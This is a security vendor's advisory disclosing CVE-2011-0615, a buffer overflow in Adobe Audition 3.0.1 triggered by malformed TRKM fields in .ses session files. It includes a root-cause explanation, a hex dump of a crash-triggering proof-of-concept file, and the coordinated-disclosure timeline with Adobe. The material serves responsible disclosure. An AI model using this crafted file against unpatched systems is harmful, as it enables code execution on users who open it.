-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - Corelabs Advisory http://corelabs.coresecurity.com/ Adobe Audition vulnerability processing malformed session file 1. *Advisory Information* Title: Adobe Audition vulnerability processing malformed session file Advisory ID: CORE-2011-0204 Advisory URL: http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file Date published: 2011-05-12 Date of last update: 2011-05-12 Vendors contacted: Adobe Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer Overflow [CWE-119] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-0615 3. *Vulnerability Description* Adobe Audition is a digital audio workstation software for Windows that was originally developed by Syntrillium as Cool Edit Pro, and acquired by Adobe in 2003. The software allows user to do multitrack audio mixing and editing and supports storing of multitrack audio using a session file format (.ses). Adobe audition is vulnerable to numerous buffer overflows while parsing several fields inside the TRKM chunk on session (.ses) files. Then, a memory corruption can be leveraged to execute arbitrary code on vulnerable systems by enticing users to open specially crafted session files. This vulnerability could be used by a remote attacker to execute arbitrary code with the privileges of the user that opened the malicious file. 4. *Vulnerable packages* . Adobe Audition 3.0.1. . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Adobe Audition CS5.5. 6. *Vendor Information, Solutions and Workarounds* Adobe strongly recommends Audition users discontinue use of the Adobe Session (.ses) file format and switch to use of the XML session format. With the release of Audition CS5.5, the binary Audition Session (.ses) file format is no longer supported. 7. *Credits* These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and Laura Balian from Core Security Technologies. Additional research, exploitability analysis and PoC were made by Diego Juarez from Core Exploit Writers Team. 8. *Technical Description / Proof of Concept Code* Adobe audition is vulnerable to numerous buffer overflows while parsing several fields inside the 'TRKM' chunk on session (.ses) files. The vulnerability comes from passing a wrongly assumed max buffer size to the function found at address 0x483F065A. This function has a prototype similar to this: /----- unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src); - -----/ The 'size' parameter is assumed to be in WCHARs but (while parsing session files) the code uses it as a size expressed in bytes, leading to multiple buffer overflows in several fields in the 'TRKM' chunk of the session file. 8.1. *Proof of Concept* The following (dumped) .ses file should trigger the vulnerability. /----- 00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM 00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ? 00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T 00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?' 00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e 00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0 00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ? 00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @? 00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i 00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0 000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s 000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ? 000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o 000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ? 000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o 000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i 00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o 00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ? 00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u 00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ? 00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @ 00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA 00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA 000001E0: 41 - - - A - -----/ 9. *Report Timeline* . 2011-02-03: Core Advisories Team notifies Adobe PSIRT several crashes in Adobe Audition and asks for technical assistance in order to determine if these crashes can result into a security vulnerability. . 2011-02-03: Vendor acknowledges reception of the last email and notifies that the Adobe tracking number 850 was opened to track this issue. . 2011-02-24: Core notifies that there has been no communication in the last 3 weeks and asks for a status update about the reported crashes. . 2011-02-28: Adobe PSIRT notifies that the file format affected by the issue will no longer be supported with the next release of Audition, planned for May 2011. Vendor also notifies their plan to publish a Security Bulletin, including an acknowledgement for this report. . 2011-03-09: Core notifies that the impact of these bugs is not clear and requests technical information to understand the nature and root cause of the reported crashes rather than purely information about Adobe release decisions. Core also requires Adobe to clarify if this bug is considered exploitable and asks if patches or fixes are going to be released as well. . 2011-03-16: Core asks for a status update. . 2011-03-16: PSIRT notifies that they have not done any analysis to determine if this issue is exploitable because: 1. The .ses file format is an older format that will not be supported with the next release. 2. The .ses files store information about a recording session; they are not typically exchanged between parties over email, and are even less likely to be accepted and opened from non-trusted sources. 3. Adobe has been encouraging people to use XML files in place of the binary .ses file format for the last year [1]. 4. The installed base for Audition is small compared with higher-profile Adobe products. For the above mentioned reasons, vendor considers that it is not a high priority to perform a vulnerability analysis. Vendor also notifies that they are currently planning to publish a Security Bulletin in May 2011 with the release of the next major version of Audition. . 2011-04-04: Core notifies that additional research was done by Diego Juarez and the reported flaws seem to be exploitable. Core notifies the advisory will be released when these Adobe patches become available. . 2011-04-04: Vendor notifies that the Adobe ID 897 was opened to track this case and they are on track for releasing patches in May. . 2011-04-28: Core notifies that the advisory publication was rescheduled to May 10th and requests confirmation for a coordinated release. Core also requests further information regarding the affected and patched versions numbers. . 2011-05-05: Vendor notifies that these issues should be resolved in the upcoming release of Adobe Audition planned for May 10th. . 2011-05-06: Vendor notifies that due to a last minute change, the release was tentatively rescheduled for May 12th. . 2011-05-06: Core reschedules advisory publication for May 12th. . 2011-05-12: Advisory CORE-2011-0204 is published. 10. *References* [1] http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg 6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d =EybH -----END PGP SIGNATURE-----